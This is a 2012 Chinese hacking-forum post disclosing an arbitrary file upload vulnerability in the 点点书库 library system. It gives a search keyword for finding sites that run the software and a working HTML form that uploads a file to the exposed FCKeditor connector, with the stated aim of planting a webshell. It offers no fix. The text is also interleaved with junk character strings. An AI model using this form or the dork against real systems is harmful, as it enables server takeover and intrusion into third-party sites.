找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7581|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞
' i: m6 n# v8 Q5 ^/ I+ \+ X 作者:冰锋刺客
) W6 g" u  i1 W( P 厂商:点击书(dianjishu.com)
6 _, g2 T. A  o2 O0 y 日期:2012-6-21
% n8 m8 @9 g+ _* a) K  ]2 s
# s7 z$ {6 L* n; ]5 Y+ A  `I 概述
& A( u) B' y7 J/ _   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell! y2 w1 ?7 z3 n7 R1 i% D8 ^. C
II 简介
, b" i7 l' S, A2 Z7 ]5 A- s   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
3 @7 F  L1 b7 |" K, x8 Z" l 补充一个漏洞
$ K' O% d! b4 n7 U1 h* r <form id="frmUpload" enctype="multipart/form-data"! s" {! V0 R9 F  S6 ]/ I
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>% u! f' B, Y! b6 K" ^; C: M. {
<input id="btnUpload" type="submit" value="操翻他">
  u  f2 w$ D$ _' ~! N3 I </form>
" b8 n! Q5 M) n' m; t 你们懂的
( k, c& x1 N2 D9 }' G7 ^& U7 y 那傻逼提供还需要改包.( A9 j+ L4 D: \
自己看了下源代码发现fckeditor
" h4 u. l+ ?! l. [# F- v 直接秒杀
; _2 s) ?4 g! B' T: J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表